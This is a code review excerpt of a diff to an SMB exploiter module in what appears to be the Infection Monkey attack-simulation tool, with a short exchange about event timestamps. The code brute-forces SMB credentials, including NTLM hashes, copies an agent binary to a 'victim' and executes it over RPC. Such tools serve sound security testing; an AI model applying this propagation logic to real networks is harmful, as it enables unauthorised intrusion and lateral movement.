monkey/infection_monkey/exploit/smbexec.py

```diff
@@ -29,15 +49,73 @@ class SMBExploiter(HostExploiter):
     }
     USE_KERBEROS = False
     SMB_SERVICE_NAME = "InfectionMonkey"
+    _EXPLOITER_TAGS = (
+        SMBEXEC_EXPLOITER_TAG,
+        T1021_ATTACK_TECHNIQUE_TAG,
+        T1110_ATTACK_TECHNIQUE_TAG,
+        T1210_ATTACK_TECHNIQUE_TAG,
+    )
+    _PROPAGATION_TAGS = (
+        SMBEXEC_EXPLOITER_TAG,
+        T1021_ATTACK_TECHNIQUE_TAG,
+        T1105_ATTACK_TECHNIQUE_TAG,
+        T1210_ATTACK_TECHNIQUE_TAG,
+    )
 
     def _exploit_host(self):
-        agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
+
         dest_path = get_agent_dst_path(self.host)
-        creds = generate_brute_force_combinations(self.options["credentials"])
+        remote_full_path, creds, timestamp = self._exploit(dest_path)
+
+        if not self.exploit_result.exploitation_success:
+            if self._is_interrupted():
+                self._set_interrupted()
+            else:
+                logger.debug("Exploiter SmbExec is giving up...")
+                self.exploit_result.error_message = "Failed to authenticate to the victim over SMB"
+
+            return self.exploit_result
+
+        # execute the remote dropper in case the path isn't final
+        cmdline = self._get_agent_command(remote_full_path, dest_path)
+
+        scmr_rpc = self._get_rpc_connection(creds)
+
+        if not scmr_rpc:
+            msg = "Failed to establish an RPC connection over SMB"
 
+            logger.warning(msg)
+            self.exploit_result.error_message = msg
+
+            return self.exploit_result
+
+        if not self._run_agent_on_victim(scmr_rpc, cmdline, timestamp):
+            return self.exploit_result
+
+        logger.info(
+            "Executed monkey '%s' on remote victim %r (cmdline=%r)",
+            remote_full_path,
+            self.host,
+            cmdline,
+        )
+        self.exploit_result.propagation_success = True
+
+        self.add_vuln_port(
+            "%s or %s"
+            % (
+                SMBExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
+                SMBExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
+            )
+        )
+        return self.exploit_result
+
+    def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials, float]:
+        agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
+        creds = generate_brute_force_combinations(self.options["credentials"])
         for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt):
             creds_for_log = get_credential_string([user, password, lm_hash, ntlm_hash])
 
+            timestamp = time()
```

Comment:
With this approach, both exploitation and propagation will have the same timestamp which is wrong.

Reply:
As discussed, we will use the timestamp from when we copy the file for propagation. We will re-evaluate if/when we add events for copying the file.